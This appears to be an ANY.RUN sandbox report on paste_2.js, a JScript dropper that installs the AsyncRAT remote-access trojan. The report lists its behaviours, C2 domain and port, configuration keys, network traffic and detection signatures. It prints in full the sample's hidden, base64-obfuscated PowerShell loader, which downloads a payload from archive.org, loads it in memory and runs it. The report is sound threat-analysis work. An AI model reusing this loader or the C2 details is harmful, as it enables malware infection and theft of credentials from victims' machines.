File name:

paste_2.js

Full analysis: https://app.any.run/tasks/def37721-3d90-4926-85a6-38a1f5065f96
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: April 29, 2025, 09:32:13
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
rat
asyncrat
remote
stealer
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (318), with CRLF line terminators
MD5:

5A8E2C737A0B532840BE9474443617B6

SHA1:

55302F01D7DF89DB6E81D55F1CEBFB4CB59CD0F5

SHA256:

5BFEDB358B5EBE7DB6793DFB87885FD08D547CDEA786659654BC717C98825A00

SSDEEP:

384:9cvcvcvcvcvcvcvcvcvcvocvcvcvcvcvcvcvcvcvcvocvcvcvcvcvcvcvcvcvcvC:Un

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7536)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 7536)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 7536)

    • Starts Visual C# compiler

      • powershell.exe (PID: 7536)

    • Steals credentials from Web Browsers

      • csc.exe (PID: 7288)

    • ASYNCRAT has been detected (SURICATA)

      • csc.exe (PID: 7288)

    • Actions looks like stealing of personal data

      • csc.exe (PID: 7288)

    • ASYNCRAT has been detected (YARA)

      • csc.exe (PID: 7288)

  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 7480)

    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 7480)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 7480)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7480)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 7480)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 7480)

    • Executes script without checking the security policy

      • powershell.exe (PID: 7536)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7536)

    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 8140)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 7536)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 7536)

    • Contacting a server suspected of hosting an CnC

      • csc.exe (PID: 7288)

    • Connects to unusual port

      • csc.exe (PID: 7288)

  • INFO

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7536)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 7536)

    • Disables trace logs

      • powershell.exe (PID: 7536)

    • Checks proxy server information

      • powershell.exe (PID: 7536)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7536)

    • Checks supported languages

      • csc.exe (PID: 7288)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 7288)

    • Reads the software policy settings

      • csc.exe (PID: 7288)
      • slui.exe (PID: 7684)

    • Reads the computer name

      • csc.exe (PID: 7288)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AsyncRat

(PID) Process(7288) csc.exe
C2 (1)deadpoolstart2051.duckdns.org
Ports (1)6090
Version| CRACKED BY https://t.me/xworm_v2
Options
AutoRunfalse
Mutextempcokie
InstallFolder%AppData%
Certificates
Cert1MIIE8jCCAtqgAwIBAgIQAOQb7nA/hP/L1XXxqdDJNzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjMwNTI1MDUyMTIyWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIykAVxs0s6rZ/dwP6ujJtpnj6RSsCsZN6Cfj1InZxSIswX+zNiKJys8xyLlyexoya3ebLp5gOSz...
Server_SignatureeIMkmIxVJ5Tj5J90B957TUYGaygFGdEfPQ+l0BZG4gl0RnBWHJ1OPPB6sC63rz/h3gSpCkXHGqS2nUoW0VDVqKGAQRl+orO7W/l4j8w2oLR6cR5TVK7UrrlbXig1NijTTxDqgS3x4TkrXvkla8h0Uo2zbG8IOMl/aefUo266YvFr/13E4nr1pJ/MaUncRW1rcTdslekXeRKaU45phT/lFTR/+ZylAKG2ik0da97CMsXxeTcIvbAtgYBNkqqdmQCsJChr8iVf0qP2rht8vCMaHaMLgzycQGe3ZTCjwYtnJcIl...
Keys
AESb091efc3a9ca5b3bebea52be73ef433c79f735e302c272cba7b57c4f3a6a784b
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
139
Monitored processes
12
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe cmd.exe no specs conhost.exe no specs csc.exe no specs csc.exe no specs #ASYNCRAT csc.exe svchost.exe slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
516C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
7256"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
7268"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
7288"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
AsyncRat
(PID) Process(7288) csc.exe
C2 (1)deadpoolstart2051.duckdns.org
Ports (1)6090
Version| CRACKED BY https://t.me/xworm_v2
Options
AutoRunfalse
Mutextempcokie
InstallFolder%AppData%
Certificates
Cert1MIIE8jCCAtqgAwIBAgIQAOQb7nA/hP/L1XXxqdDJNzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjMwNTI1MDUyMTIyWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIykAVxs0s6rZ/dwP6ujJtpnj6RSsCsZN6Cfj1InZxSIswX+zNiKJys8xyLlyexoya3ebLp5gOSz...
Server_SignatureeIMkmIxVJ5Tj5J90B957TUYGaygFGdEfPQ+l0BZG4gl0RnBWHJ1OPPB6sC63rz/h3gSpCkXHGqS2nUoW0VDVqKGAQRl+orO7W/l4j8w2oLR6cR5TVK7UrrlbXig1NijTTxDqgS3x4TkrXvkla8h0Uo2zbG8IOMl/aefUo266YvFr/13E4nr1pJ/MaUncRW1rcTdslekXeRKaU45phT/lFTR/+ZylAKG2ik0da97CMsXxeTcIvbAtgYBNkqqdmQCsJChr8iVf0qP2rht8vCMaHaMLgzycQGe3ZTCjwYtnJcIl...
Keys
AESb091efc3a9ca5b3bebea52be73ef433c79f735e302c272cba7b57c4f3a6a784b
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
7480"C:\Windows\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\paste_2.jsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7536"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$gigalitres = 'JABwAG8AbAB5AG0AZQB0AGgAeQBsACAAPQAgACcAMAAvAFYASQB1AHcAQQB5AHoARQAvAGQALwBlAGUALgBlACMAcwBhAHAALwAvADoAcwBwACMAIwBoACcAOwAkAHMAdQBwAGUAcgBoAGUAcgBvAGkAbgBlAHMAIAA9ACAAJABwAG8AbAB5AG0AZQB0AGgAeQBsACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABxAHUAYQB0AHIAaQBiAGwAZQAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAYgBlAGcAdQBpAGwAdAB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGIAZQBnAHUAaQBsAHQAeQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABzAHAAZQBjAGkAbwBsAG8AZwB5ACAAPQAgACQAYgBlAGcAdQBpAGwAdAB5AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHEAdQBhAHQAcgBpAGIAbABlACkAOwAkAGMAbwByAGIAZQBsAGEAdABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABzAHAAZQBjAGkAbwBsAG8AZwB5ACkAOwAkAHQAbwBjAHMAaQBuACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABqAGEAcwBtAHMAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYQBiAGwAaQBnAGEAdABlAHMAIAA9ACAAJABjAG8AcgBiAGUAbABhAHQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAdABvAGMAcwBpAG4AKQA7ACQAbQBhAGsAYQByAG8AbgAgAD0AIAAkAGMAbwByAGIAZQBsAGEAdABlAGQALgBJAG4AZABlAHgATwBmACgAJABqAGEAcwBtAHMAKQA7ACQAYQBiAGwAaQBnAGEAdABlAHMAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABtAGEAawBhAHIAbwBuACAALQBnAHQAIAAkAGEAYgBsAGkAZwBhAHQAZQBzADsAJABhAGIAbABpAGcAYQB0AGUAcwAgACsAPQAgACQAdABvAGMAcwBpAG4ALgBMAGUAbgBnAHQAaAA7ACQAaABlAHIAdAB6AGkAYQBuACAAPQAgACQAbQBhAGsAYQByAG8AbgAgAC0AIAAkAGEAYgBsAGkAZwBhAHQAZQBzADsAJABrAGkAcgBzAG8AbQAgAD0AIAAkAGMAbwByAGIAZQBsAGEAdABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYQBiAGwAaQBnAGEAdABlAHMALAAgACQAaABlAHIAdAB6AGkAYQBuACkAOwAkAGIAYQBsAGQAYQBjAGgAaQBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGsAaQByAHMAbwBtACkAOwAkAGEAYgBiAGEAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABiAGEAbABkAGEAYwBoAGkAbgApADsAJABwAGEAcgBsAG8AdQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcwB1AHAAZQByAGgAZQByAG8AaQBuAGUAcwAsACcAMQAnACwAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAEQAbwB3AG4AbABvAGEAZABzACcALAAnAGYAbABhAG4AZQB1AHIAcwAnACwAJwBjAHMAYwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAJwAsACcAMgAnACwAJwAnACkAKQA=' -replace '','';$spoonage = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($gigalitres));Invoke-Expression $spoonage;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7544\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7648C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7684"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
10 097
Read events
10 095
Write events
2
Delete events
0

Modification events

(PID) Process:(7480) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
B8BF100000000000
(PID) Process:(7536) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Path
Value:
C:\Users\Public\Downloads\flaneurs.js
Executable files
0
Suspicious files
1
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
7536powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gxza21zm.pyo.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7536powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:90136766C4BBFC68F902CC1B963A6DD3
SHA256:35A2FB3E86D16CDB7A907B0E9E1BE1FC7634EE8477566F34FE1F648813469043
8140cmd.exeC:\Users\Public\Downloads\flaneurs.jstext
MD5:D552AFE0B5135D6BA9DD20B62B753E31
SHA256:1D9773BAAECF59BEFCA2462C8ABBE5332688F25236F41E4F7505E94DDD71744C
7536powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jocfrbbq.ezq.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
24
DNS requests
19
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.32.238.107:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
23.63.118.230:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5512
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5512
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.32.238.107:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2.23.181.156:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7536
powershell.exe
207.241.224.2:443
archive.org
INTERNET-ARCHIVE
US
whitelisted
7536
powershell.exe
207.241.227.90:443
ia601700.us.archive.org
INTERNET-ARCHIVE
US
whitelisted
6544
svchost.exe
20.190.160.66:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
23.63.118.230:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 216.58.206.46
whitelisted
crl.microsoft.com
  • 23.32.238.107
  • 23.32.238.112
whitelisted
www.microsoft.com
  • 2.23.181.156
  • 2.23.246.101
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
archive.org
  • 207.241.224.2
whitelisted
ia601700.us.archive.org
  • 207.241.227.90
whitelisted
login.live.com
  • 20.190.160.66
  • 20.190.160.17
  • 20.190.160.22
  • 20.190.160.2
  • 40.126.32.140
  • 20.190.160.128
  • 20.190.160.3
  • 20.190.160.20
whitelisted
ocsp.digicert.com
  • 23.63.118.230
whitelisted
paste.ee
  • 23.186.113.60
shared

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)
7536
powershell.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
7288
csc.exe
Domain Observed Used for C2 Detected
REMOTE [ANY.RUN] AsyncRAT SSL certificate
2196
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
7288
csc.exe
Domain Observed Used for C2 Detected
ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert
7288
csc.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
7288
csc.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] AsyncRAT Successful Connection
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
paste_2.js